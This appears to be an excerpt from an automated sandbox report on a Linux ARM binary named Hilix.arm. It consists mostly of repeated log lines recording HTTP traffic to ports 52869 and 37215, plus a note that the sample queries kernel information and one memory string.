Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 59502
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60606 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60624 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50314 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50318 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44220 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35180 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42792 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46480 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46486 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37900 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50282 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37916 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37916 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53460 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53464 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36894 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52754 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53796 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57992 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42006 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55818 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33852 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60430 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60440 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60432 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 60422
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 60432
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44516 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 53954
Source: unknown	Network traffic detected: HTTP traffic on port 53958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 53958
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60208 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52738 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58508 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34680 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42850 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44520 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51628 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39502 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53696 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53706 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45424 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 33774
Source: unknown	Network traffic detected: HTTP traffic on port 45428 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 33780
Source: unknown	Network traffic detected: HTTP traffic on port 49118 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869

Source: /tmp/Hilix.arm (PID: 5244)

Queries kernel information via 'uname':

Source: Hilix.arm, 5244.1.00000000ea87e5a5.000000005c832e06.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
